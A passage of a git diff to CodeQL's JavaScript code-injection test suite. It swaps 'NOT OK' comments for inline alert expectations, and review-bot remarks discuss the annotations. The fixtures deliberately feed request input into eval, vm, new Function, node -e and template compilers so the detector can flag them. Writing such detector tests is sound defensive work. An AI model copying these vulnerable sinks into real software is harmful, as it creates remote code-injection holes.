tst.js:35:28:35:33 | source | semmle.label | source | -| tst.js:37:33:37:38 | source | semmle.label | source | +| tst.js:1:6:1:27 | documen ... on.href | semmle.label | documen ... on.href | +| tst.js:1:6:1:83 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:3:12:3:33 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:11:10:11:33 | documen ... .search | semmle.label | documen ... 
.search | +| tst.js:11:10:11:74 | documen ... , "$1") | semmle.label | documen ... , "$1") | +| tst.js:13:21:13:42 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:15:30:15:51 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:17:6:17:46 | atob(do ... ing(1)) | semmle.label | atob(do ... ing(1)) | +| tst.js:17:11:17:32 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:17:11:17:45 | documen ... ring(1) | semmle.label | documen ... ring(1) | +| tst.js:19:26:19:40 | location.search | semmle.label | location.search | +| tst.js:19:26:19:53 | locatio ... ring(1) | semmle.label | locatio ... ring(1) | +| tst.js:22:9:22:82 | source | semmle.label | source | +| tst.js:22:18:22:41 | documen ... .search | semmle.label | documen ... .search | +| tst.js:22:18:22:82 | documen ... , "$1") | semmle.label | documen ... , "$1") | +| tst.js:24:18:24:23 | source | semmle.label | source | +| tst.js:26:14:26:19 | source | semmle.label | source | +| tst.js:28:28:28:33 | source | semmle.label | source | +| tst.js:30:33:30:38 | source | semmle.label | source | | webix/webix.html:3:16:3:37 | documen ... on.hash | semmle.label | documen ... on.hash | | webix/webix.html:4:26:4:47 | documen ... on.hash | semmle.label | documen ... on.hash | | webix/webix.html:5:47:5:68 | documen ... on.hash | semmle.label | documen ... on.hash | diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/ImproperCodeSanitization.expected b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/ImproperCodeSanitization.expected index 48fa61317807..84c50efddc96 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/ImproperCodeSanitization.expected +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/ImproperCodeSanitization.expected 
@@ -1,3 +1,12 @@ +#select +| bad-code-sanitization.js:8:27:8:46 | statements.join(';') | bad-code-sanitization.js:2:69:2:87 | JSON.stringify(key) | bad-code-sanitization.js:8:27:8:46 | statements.join(';') | Code construction depends on an $@. | bad-code-sanitization.js:2:69:2:87 | JSON.stringify(key) | improperly sanitized value | +| bad-code-sanitization.js:15:44:15:63 | htmlescape(pathname) | bad-code-sanitization.js:15:44:15:63 | htmlescape(pathname) | bad-code-sanitization.js:15:44:15:63 | htmlescape(pathname) | Code construction depends on an $@. | bad-code-sanitization.js:15:44:15:63 | htmlescape(pathname) | improperly sanitized value | +| bad-code-sanitization.js:19:27:19:47 | JSON.st ... (input) | bad-code-sanitization.js:19:27:19:47 | JSON.st ... (input) | bad-code-sanitization.js:19:27:19:47 | JSON.st ... (input) | Code construction depends on an $@. | bad-code-sanitization.js:19:27:19:47 | JSON.st ... (input) | improperly sanitized value | +| bad-code-sanitization.js:31:30:31:50 | JSON.st ... (input) | bad-code-sanitization.js:31:30:31:50 | JSON.st ... (input) | bad-code-sanitization.js:31:30:31:50 | JSON.st ... (input) | Code construction depends on an $@. | bad-code-sanitization.js:31:30:31:50 | JSON.st ... (input) | improperly sanitized value | +| bad-code-sanitization.js:40:23:40:43 | JSON.st ... (input) | bad-code-sanitization.js:40:23:40:43 | JSON.st ... (input) | bad-code-sanitization.js:40:23:40:43 | JSON.st ... (input) | Code construction depends on an $@. | bad-code-sanitization.js:40:23:40:43 | JSON.st ... (input) | improperly sanitized value | +| bad-code-sanitization.js:44:22:44:42 | JSON.st ... (input) | bad-code-sanitization.js:44:22:44:42 | JSON.st ... (input) | bad-code-sanitization.js:44:22:44:42 | JSON.st ... (input) | Code construction depends on an $@. | bad-code-sanitization.js:44:22:44:42 | JSON.st ... (input) | improperly sanitized value | +| bad-code-sanitization.js:52:28:52:62 | JSON.st ... 
bble")) | bad-code-sanitization.js:52:28:52:62 | JSON.st ... bble")) | bad-code-sanitization.js:52:28:52:62 | JSON.st ... bble")) | Code construction depends on an $@. | bad-code-sanitization.js:52:28:52:62 | JSON.st ... bble")) | improperly sanitized value | +| bad-code-sanitization.js:64:27:64:36 | assignment | bad-code-sanitization.js:63:31:63:49 | JSON.stringify(key) | bad-code-sanitization.js:64:27:64:36 | assignment | Code construction depends on an $@. | bad-code-sanitization.js:63:31:63:49 | JSON.stringify(key) | improperly sanitized value | edges | bad-code-sanitization.js:2:12:2:90 | /^[_$a- ... key)}]` | bad-code-sanitization.js:7:31:7:43 | safeProp(key) | provenance | | | bad-code-sanitization.js:2:69:2:87 | JSON.stringify(key) | bad-code-sanitization.js:2:12:2:90 | /^[_$a- ... key)}]` | provenance | | 
@@ -27,12 +36,3 @@ nodes | bad-code-sanitization.js:63:31:63:49 | JSON.stringify(key) | semmle.label | JSON.stringify(key) | | bad-code-sanitization.js:64:27:64:36 | assignment | semmle.label | assignment | subpaths -#select -| bad-code-sanitization.js:8:27:8:46 | statements.join(';') | bad-code-sanitization.js:2:69:2:87 | JSON.stringify(key) | bad-code-sanitization.js:8:27:8:46 | statements.join(';') | Code construction depends on an $@. | bad-code-sanitization.js:2:69:2:87 | JSON.stringify(key) | improperly sanitized value | -| bad-code-sanitization.js:15:44:15:63 | htmlescape(pathname) | bad-code-sanitization.js:15:44:15:63 | htmlescape(pathname) | bad-code-sanitization.js:15:44:15:63 | htmlescape(pathname) | Code construction depends on an $@. | bad-code-sanitization.js:15:44:15:63 | htmlescape(pathname) | improperly sanitized value | -| bad-code-sanitization.js:19:27:19:47 | JSON.st ... (input) | bad-code-sanitization.js:19:27:19:47 | JSON.st ... (input) | bad-code-sanitization.js:19:27:19:47 | JSON.st ... (input) | Code construction depends on an $@. | bad-code-sanitization.js:19:27:19:47 | JSON.st ... (input) | improperly sanitized value | -| bad-code-sanitization.js:31:30:31:50 | JSON.st ... (input) | bad-code-sanitization.js:31:30:31:50 | JSON.st ... (input) | bad-code-sanitization.js:31:30:31:50 | JSON.st ... (input) | Code construction depends on an $@. | bad-code-sanitization.js:31:30:31:50 | JSON.st ... (input) | improperly sanitized value | -| bad-code-sanitization.js:40:23:40:43 | JSON.st ... (input) | bad-code-sanitization.js:40:23:40:43 | JSON.st ... (input) | bad-code-sanitization.js:40:23:40:43 | JSON.st ... (input) | Code construction depends on an $@. | bad-code-sanitization.js:40:23:40:43 | JSON.st ... (input) | improperly sanitized value | -| bad-code-sanitization.js:44:22:44:42 | JSON.st ... (input) | bad-code-sanitization.js:44:22:44:42 | JSON.st ... (input) | bad-code-sanitization.js:44:22:44:42 | JSON.st ... 
(input) | Code construction depends on an $@. | bad-code-sanitization.js:44:22:44:42 | JSON.st ... (input) | improperly sanitized value | -| bad-code-sanitization.js:52:28:52:62 | JSON.st ... bble")) | bad-code-sanitization.js:52:28:52:62 | JSON.st ... bble")) | bad-code-sanitization.js:52:28:52:62 | JSON.st ... bble")) | Code construction depends on an $@. | bad-code-sanitization.js:52:28:52:62 | JSON.st ... bble")) | improperly sanitized value | -| bad-code-sanitization.js:64:27:64:36 | assignment | bad-code-sanitization.js:63:31:63:49 | JSON.stringify(key) | bad-code-sanitization.js:64:27:64:36 | assignment | Code construction depends on an $@. | bad-code-sanitization.js:63:31:63:49 | JSON.stringify(key) | improperly sanitized value | diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/ImproperCodeSanitization.qlref b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/ImproperCodeSanitization.qlref index 20c6dffd7b3e..7b474710a84e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/ImproperCodeSanitization.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/ImproperCodeSanitization.qlref @@ -1 +1,2 @@ -Security/CWE-094/ImproperCodeSanitization.ql +query: Security/CWE-094/ImproperCodeSanitization.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/NoSQLCodeInjection.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/NoSQLCodeInjection.js index 6facf5ec75a5..0aeb77af5a20 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/NoSQLCodeInjection.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/NoSQLCodeInjection.js 
@@ -14,12 +14,12 @@ app.post("/documents/find", (req, res) => { MongoClient.connect("mongodb://localhost:27017/test", (err, db) => { let doc = db.collection("doc"); - doc.find(query); // NOT OK, but that is flagged by js/sql-injection [INCONSISTENCY] - doc.find({ $where: req.body.query }); // NOT OK - doc.find({ $where: "name = " + req.body.name }); // NOT OK + doc.find(query); // $ MISSING: Alert - that is flagged by js/sql-injection + doc.find({ $where: req.body.query }); // $ Alert[js/code-injection] + doc.find({ $where: "name = " + req.body.name }); // $ Alert[js/code-injection] function mkWhereObj() { - return { $where: "name = " + req.body.name }; // NOT OK + return { $where: "name = " + req.body.name }; // $ Alert[js/code-injection] } doc.find(mkWhereObj()); // the alert location is in mkWhereObj. diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/UnsafeCodeConstruction.expected b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/UnsafeCodeConstruction.expected index 868f2a287441..c466338d82ee 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/UnsafeCodeConstruction.expected +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/UnsafeCodeConstruction.expected 
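Review bot: On the `doc.find(query)` line, `// $ MISSING: Alert - that is flagged by js/sql-injection` reads as a known false negative of the code-injection query, whereas the removed comment described an inconsistency that another query already covers. If js/code-injection is not meant to report this call, the line presumably should carry no expectation and only a plain comment such as `// flagged by js/sql-injection, not by js/code-injection`. If it is meant to report it, the comment should say why the result is currently missed. The definition of `query` and the rest of the handler lie outside the hunk, so which reading is intended cannot be confirmed from here.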
@@ -1,3 +1,8 @@ +#select +| lib/index.js:2:21:2:24 | data | lib/index.js:1:35:1:38 | data | lib/index.js:2:21:2:24 | data | This string concatenation which depends on $@ is later $@. | lib/index.js:1:35:1:38 | data | library input | lib/index.js:2:15:2:30 | "(" + data + ")" | interpreted as code | +| lib/index.js:6:26:6:29 | name | lib/index.js:5:35:5:38 | name | lib/index.js:6:26:6:29 | name | This string concatenation which depends on $@ is later $@. | lib/index.js:5:35:5:38 | name | library input | lib/index.js:6:17:6:29 | "obj." + name | interpreted as code | +| lib/index.js:14:21:14:24 | data | lib/index.js:13:38:13:41 | data | lib/index.js:14:21:14:24 | data | This string concatenation which depends on $@ is later $@. | lib/index.js:13:38:13:41 | data | library input | lib/index.js:14:15:14:30 | "(" + data + ")" | interpreted as code | +| lib/index.js:22:7:22:10 | data | lib/index.js:19:26:19:29 | data | lib/index.js:22:7:22:10 | data | This string concatenation which depends on $@ is later $@. | lib/index.js:19:26:19:29 | data | library input | lib/index.js:25:24:25:26 | str | interpreted as code | edges | lib/index.js:1:35:1:38 | data | lib/index.js:2:21:2:24 | data | provenance | | | lib/index.js:5:35:5:38 | name | lib/index.js:6:26:6:29 | name | provenance | | 
@@ -13,8 +18,3 @@ nodes | lib/index.js:19:26:19:29 | data | semmle.label | data | | lib/index.js:22:7:22:10 | data | semmle.label | data | subpaths -#select -| lib/index.js:2:21:2:24 | data | lib/index.js:1:35:1:38 | data | lib/index.js:2:21:2:24 | data | This string concatenation which depends on $@ is later $@. | lib/index.js:1:35:1:38 | data | library input | lib/index.js:2:15:2:30 | "(" + data + ")" | interpreted as code | -| lib/index.js:6:26:6:29 | name | lib/index.js:5:35:5:38 | name | lib/index.js:6:26:6:29 | name | This string concatenation which depends on $@ is later $@. | lib/index.js:5:35:5:38 | name | library input | lib/index.js:6:17:6:29 | "obj." + name | interpreted as code | -| lib/index.js:14:21:14:24 | data | lib/index.js:13:38:13:41 | data | lib/index.js:14:21:14:24 | data | This string concatenation which depends on $@ is later $@. | lib/index.js:13:38:13:41 | data | library input | lib/index.js:14:15:14:30 | "(" + data + ")" | interpreted as code | -| lib/index.js:22:7:22:10 | data | lib/index.js:19:26:19:29 | data | lib/index.js:22:7:22:10 | data | This string concatenation which depends on $@ is later $@. | lib/index.js:19:26:19:29 | data | library input | lib/index.js:25:24:25:26 | str | interpreted as code | diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/UnsafeCodeConstruction.qlref b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/UnsafeCodeConstruction.qlref index 1b4dc21b8205..6e2be158d1d1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/UnsafeCodeConstruction.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/UnsafeCodeConstruction.qlref @@ -1 +1,2 @@ -Security/CWE-094/UnsafeCodeConstruction.ql +query: Security/CWE-094/UnsafeCodeConstruction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/actions.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/actions.js index df5cd88971a3..62158678073c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/actions.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/actions.js @@ -1,5 +1,5 @@ const github = require('@actions/github'); function test() { - eval(github.context.payload.commits[1].message); // NOT OK + eval(github.context.payload.commits[1].message); // $ Alert[js/code-injection] } diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/angularjs.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/angularjs.js index 658d71e4c879..fb28264b5cec 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/angularjs.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/angularjs.js 
@@ -1,66 +1,66 @@ angular.module('myModule', []) .controller('MyController', function($scope) { - $scope.$on(location.search); // OK + $scope.$on(location.search); }) .controller('MyController', function($scope) { - $scope.$apply('hello'); // OK + $scope.$apply('hello'); }) .controller('MyController', function($scope) { var scope = $scope; - scope.$apply(location.search); // BAD + scope.$apply(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$apply(location.search); // BAD + $scope.$apply(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$applyAsync(location.search); // BAD + $scope.$applyAsync(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$eval(location.search); // BAD + $scope.$eval(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$evalAsync(location.search); // BAD + $scope.$evalAsync(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$watch(location.search); // BAD + $scope.$watch(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$watchCollection(location.search); // BAD + $scope.$watchCollection(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$watchGroup(location.search); // BAD + $scope.$watchGroup(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($compile) { - $compile(location.search); // BAD + $compile(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($compile) { - $compile('hello'); // OK + $compile('hello'); }) .controller('MyController', function($compile) { - $compile(location.search); // BAD + $compile(location.search); // $ Alert[js/code-injection] }) 
.controller('MyController', function($compile) { var compile = $compile; - compile(location.search); // BAD + compile(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($parse) { - $parse(location.search); // BAD + $parse(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($interpolate) { - $interpolate(location.search); // BAD + $interpolate(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($filter) { - $filter('orderBy')([], location.search); // BAD + $filter('orderBy')([], location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($filter) { - $filter('orderBy')([], 'hello'); // OK + $filter('orderBy')([], 'hello'); }) .controller('MyController', function($filter) { - $filter('random')([], location.search); // OK + $filter('random')([], location.search); }) .controller('MyController', function($someService) { - $someService('orderBy')([], location.search); // OK + $someService('orderBy')([], location.search); }) .controller('MyController', function($someService) { - $someService(location.search); // OK + $someService(location.search); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/bad-code-sanitization.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/bad-code-sanitization.js index f330b1513546..8714a1fa690f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/bad-code-sanitization.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/bad-code-sanitization.js 
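Review bot: Dropping `// OK` from the negative cases (`$scope.$on(location.search)`, `$compile('hello')`, `$filter('random')([], location.search)`, `$someService(location.search)`) leaves nothing that marks them as deliberate non-sinks, and the reason each one is considered safe is not written down anywhere in the hunk. A plain comment that does not start with `$` keeps that knowledge without touching the inline expectations, for example `// 'random' is not modelled as a filter that evaluates its argument` (wording to be confirmed by the query author). The same applies to the lines that lose `// OK` in bad-code-sanitization.js, express.js, lib/index.js and tst.js later in this commit.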
@@ -1,22 +1,22 @@ function safeProp(key) { - return /^[_$a-zA-Z][_$a-zA-Z0-9]*$/.test(key) ? `.${key}` : `[${JSON.stringify(key)}]`; + return /^[_$a-zA-Z][_$a-zA-Z0-9]*$/.test(key) ? `.${key}` : `[${JSON.stringify(key)}]`; // $ Source[js/bad-code-sanitization] } function test1() { const statements = []; statements.push(`${name}${safeProp(key)}=${stringify(thing[key])}`); - return `(function(){${statements.join(';')}})` // NOT OK + return `(function(){${statements.join(';')}})` // $ Alert[js/bad-code-sanitization] } import htmlescape from 'htmlescape' function test2(props) { const pathname = props.data.pathname; - return `function(){return new Error('${htmlescape(pathname)}')}`; // NOT OK + return `function(){return new Error('${htmlescape(pathname)}')}`; // $ Alert[js/bad-code-sanitization] } function test3(input) { - return `(function(){${JSON.stringify(input)}))` // NOT OK + return `(function(){${JSON.stringify(input)}))` // $ Alert[js/bad-code-sanitization] } function evenSaferProp(key) { 
@@ -24,24 +24,24 @@ function evenSaferProp(key) { } function test4(input) { - return `(function(){${evenSaferProp(input)}))` // OK + return `(function(){${evenSaferProp(input)}))` } function test4(input) { - var foo = `(function(){${JSON.stringify(input)}))` // NOT OK - we can type-track to a code-injection sink, the source is not remote flow. + var foo = `(function(){${JSON.stringify(input)}))` // $ Alert[js/bad-code-sanitization] - we can type-track to a code-injection sink, the source is not remote flow. setTimeout(foo); } function test5(input) { - console.log('methodName() => ' + JSON.stringify(input)); // OK + console.log('methodName() => ' + JSON.stringify(input)); } function test6(input) { - return `(() => {${JSON.stringify(input)})` // NOT OK + return `(() => {${JSON.stringify(input)})` // $ Alert[js/bad-code-sanitization] } function test7(input) { - return `() => {${JSON.stringify(input)}` // NOT OK + return `() => {${JSON.stringify(input)}` // $ Alert[js/bad-code-sanitization] } var express = require('express'); @@ -49,7 +49,7 @@ var express = require('express'); var app = express(); app.get('/some/path', function(req, res) { - var foo = `(function(){${JSON.stringify(req.param("wobble"))}))` // NOT - the source is remote-flow, but we know of no sink. + var foo = `(function(){${JSON.stringify(req.param("wobble"))}))` // $ Alert[js/bad-code-sanitization] - the source is remote-flow, but we know of no sink. setTimeout(`(function(){${JSON.stringify(req.param("wobble"))}))`); // OK - the source is remote-flow, and the sink is code-injection. 
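Review bot: In the `@@ -49,7 +49,7 @@` hunk the `setTimeout(...)` context line still carries `// OK - the source is remote-flow, and the sink is code-injection`, which describes a js/code-injection result in a directory where the other lines now use query-tagged expectations. If the js/code-injection test here is also checked through inline expectations (its qlref is not visible in this part of the diff), that line would presumably need `// $ Alert[js/code-injection]`. As it stands, the leftover `// OK` is misleading for anyone scanning the file for unsafe sinks. The handler body continues past the end of the hunk.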
@@ -60,8 +60,8 @@ app.get('/some/path', function(req, res) { // Bad documentation example: function createObjectWrite() { - const assignment = `obj[${JSON.stringify(key)}]=42`; - return `(function(){${assignment}})` // NOT OK + const assignment = `obj[${JSON.stringify(key)}]=42`; // $ Source[js/bad-code-sanitization] + return `(function(){${assignment}})` // $ Alert[js/bad-code-sanitization] } // Good documentation example: @@ -87,6 +87,6 @@ function good() { function createObjectWrite() { const assignment = `obj[${escapeUnsafeChars(JSON.stringify(key))}]=42`; - return `(function(){${assignment}})` // OK + return `(function(){${assignment}})` } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/express.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/express.js index 3a5abba84c03..3cb4837c2f9e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/express.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/express.js 
@@ -3,35 +3,28 @@ var express = require('express'); var app = express(); app.get('/some/path', function(req, res) { - // NOT OK - var f = new Function("return wibbles[" + req.param("wobble") + "];"); - // NOT OK - require("vm").runInThisContext("return wibbles[" + req.param("wobble") + "];"); + var f = new Function("return wibbles[" + req.param("wobble") + "];"); // $ Alert[js/code-injection] + require("vm").runInThisContext("return wibbles[" + req.param("wobble") + "];"); // $ Alert[js/code-injection] var runC = require("vm").runInNewContext; - // NOT OK - runC("return wibbles[" + req.param("wobble") + "];"); + runC("return wibbles[" + req.param("wobble") + "];"); // $ Alert[js/code-injection] var vm = require("vm"); - // NOT OK - vm.compileFunction(req.param("code_compileFunction")); - // NOT OK - var script = new vm.Script(req.param("code_Script")); - // NOT OK - var mdl = new vm.SourceTextModule(req.param("code_SourceTextModule")); - // NOT OK - vm.runInContext(req.param("code_runInContext"), vm.createContext()); + vm.compileFunction(req.param("code_compileFunction")); // $ Alert[js/code-injection] + var script = new vm.Script(req.param("code_Script")); // $ Alert[js/code-injection] + var mdl = new vm.SourceTextModule(req.param("code_SourceTextModule")); // $ Alert[js/code-injection] + vm.runInContext(req.param("code_runInContext"), vm.createContext()); // $ Alert[js/code-injection] }); const cp = require('child_process'); app.get('/other/path', function(req, res) { - const taint = req.param("wobble"); - cp.execFileSync('node', ['-e', taint]); // NOT OK + const taint = req.param("wobble"); // $ Source[js/code-injection] + cp.execFileSync('node', ['-e', taint]); // $ Alert[js/code-injection] - cp.execFileSync('node', ['-e', `console.log(${JSON.stringify(taint)})`]); // OK + cp.execFileSync('node', ['-e', `console.log(${JSON.stringify(taint)})`]); }); const pty = require('node-pty'); app.get('/terminal', function(req, res) { - const taint = req.param("wobble"); + 
const taint = req.param("wobble"); // $ Source[js/code-injection] const shell = pty.spawn('bash', [], { name: 'xterm-color', cols: 80, @@ -40,13 +33,13 @@ app.get('/terminal', function(req, res) { env: process.env }); - shell.write(taint); // NOT OK + shell.write(taint); // $ Alert[js/code-injection] }); require("express-ws")(app); app.ws("/socket-thing/", function (ws, req) { - ws.on("message", function (msg) { - eval(msg); // NOT OK + ws.on("message", function (msg) { // $ Source[js/code-injection] + eval(msg); // $ Alert[js/code-injection] }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js index 9df334c56dc1..5cab7f3cec32 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js 
@@ -1,31 +1,31 @@ -export function unsafeDeserialize(data) { - return eval("(" + data + ")"); // NOT OK +export function unsafeDeserialize(data) { // $ Source[js/unsafe-code-construction] + return eval("(" + data + ")"); // $ Alert[js/unsafe-code-construction] } -export function unsafeGetter(obj, name) { - return eval("obj." + name); // NOT OK +export function unsafeGetter(obj, name) { // $ Source[js/unsafe-code-construction] + return eval("obj." + name); // $ Alert[js/unsafe-code-construction] } export function safeAssignment(obj, value) { - eval("obj.foo = " + JSON.stringify(value)); // OK + eval("obj.foo = " + JSON.stringify(value)); } -global.unsafeDeserialize = function (data) { - return eval("(" + data + ")"); // NOT OK +global.unsafeDeserialize = function (data) { // $ Source[js/unsafe-code-construction] + return eval("(" + data + ")"); // $ Alert[js/unsafe-code-construction] } const matter = require("gray-matter"); -export function greySink(data) { +export function greySink(data) { // $ Source[js/unsafe-code-construction] const str = ` ---js - ${data} + ${data /* $ Alert[js/unsafe-code-construction] */} --- ` const res = matter(str); console.log(res); - matter(str, { // OK + matter(str, { engines: { js: function (data) { console.log("NOPE"); @@ -48,7 +48,7 @@ export function Template(text, opts) { Template.prototype = { compile: function () { var opts = this.opts; - eval(" var " + opts.varName + " = something();"); // NOT OK + eval(" var " + opts.varName + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep }, // The below are justs tests that ensure the global-access-path computations terminate. pathsTerminate1: function (node, prev) { 
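Review bot: `// $ MISSING: Alert - due to lack of localFieldStep` on the `eval(" var " + opts.varName + ...)` line in `compile`, and on the eight `eval` lines in the two `doesTaint` hunks that follow, records that js/unsafe-code-construction does not report these sinks. The expected output in this commit lists only lines 2, 6, 14 and 22 of this file both before and after the change, so the old `// NOT OK` was never backed by a result. `localFieldStep` is not explained anywhere in these hunks, so a reader cannot tell which flow is lost. I would spell it out once at the first occurrence, e.g. `// $ MISSING: Alert - due to lack of localFieldStep (value stored on this.opts is not tracked to this read)`, assuming that is what the term means here. `compile` and both classes start outside their hunks.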
@@ -100,10 +100,10 @@ export class AccessPathClass { } doesTaint() { - eval(" var " + this.options1.taintedOption + " = something();"); // NOT OK - eval(" var " + this.options2.taintedOption + " = something();"); // NOT OK - eval(" var " + this.options3.taintedOption + " = something();"); // NOT OK - eval(" var " + this.taint + " = something();"); // NOT OK + eval(" var " + this.options1.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.options2.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.options3.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.taint + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep } } @@ -132,10 +132,10 @@ export class AccessPathClassBB { } doesTaint() { - eval(" var " + this.options1.taintedOption + " = something();"); // NOT OK - eval(" var " + this.options2.taintedOption + " = something();"); // NOT OK - eval(" var " + this.options3.taintedOption + " = something();"); // NOT OK - eval(" var " + this.taint + " = something();"); // NOT OK + eval(" var " + this.options1.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.options2.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.options3.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.taint + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/module.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/module.js index 64eeea78f2f1..18885dd25577 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/module.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/module.js @@ -6,7 +6,7 @@ var app = express(); app.get('/some/path', function (req, res) { let filename = req.query.filename; var m = new Module(filename, module.parent); - m._compile(req.query.code, filename); // NOT OK + m._compile(req.query.code, filename); // $ Alert[js/code-injection] var m2 = new module.constructor; - m2._compile(req.query.code, filename); // NOT OK + m2._compile(req.query.code, filename); // $ Alert[js/code-injection] }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react-native.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react-native.js index 0a9edc1ebe9c..dc2f5e8ec729 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react-native.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react-native.js @@ -4,8 +4,8 @@ import { WebView } from 'react-native'; var app = express(); app.get('/some/path', function(req, res) { - let tainted = req.param("code"); - ; // NOT OK + let tainted = req.param("code"); // $ Source[js/code-injection] + ; // $ Alert[js/code-injection] let wv = ; - wv.injectJavaScript(tainted); // NOT OK + wv.injectJavaScript(tainted); // $ Alert[js/code-injection] }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react.js index 54047c6f3cbd..32db7a3f621a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react.js @@ -7,7 +7,7 @@ class Application extends React.Component {
    My unsafe - + {/* $ Alert[js/code-injection] */}
    ); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/template-sinks.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/template-sinks.js index 51554663e4ee..73f75c703201 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/template-sinks.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/template-sinks.js @@ -15,20 +15,20 @@ import * as webix from "webix"; var app = express(); app.get('/some/path', function (req, res) { - let tainted = req.query.foo; + let tainted = req.query.foo; // $ Source[js/code-injection] - pug.compile(tainted); // NOT OK - pug.render(tainted); // NOT OK - jade.compile(tainted); // NOT OK - jade.render(tainted); // NOT OK - dot.template(tainted); // NOT OK - ejs.render(tainted); // NOT OK - nunjucks.renderString(tainted); // NOT OK - lodash.template(tainted); // NOT OK - dot.compile(tainted); // NOT OK - handlebars.compile(tainted); // NOT OK - mustache.render(tainted); // NOT OK - Hogan.compile(tainted); // NOT OK - Eta.render(tainted); // NOT OK - Sqrl.render(tainted); // NOT OK + pug.compile(tainted); // $ Alert[js/code-injection] + pug.render(tainted); // $ Alert[js/code-injection] + jade.compile(tainted); // $ 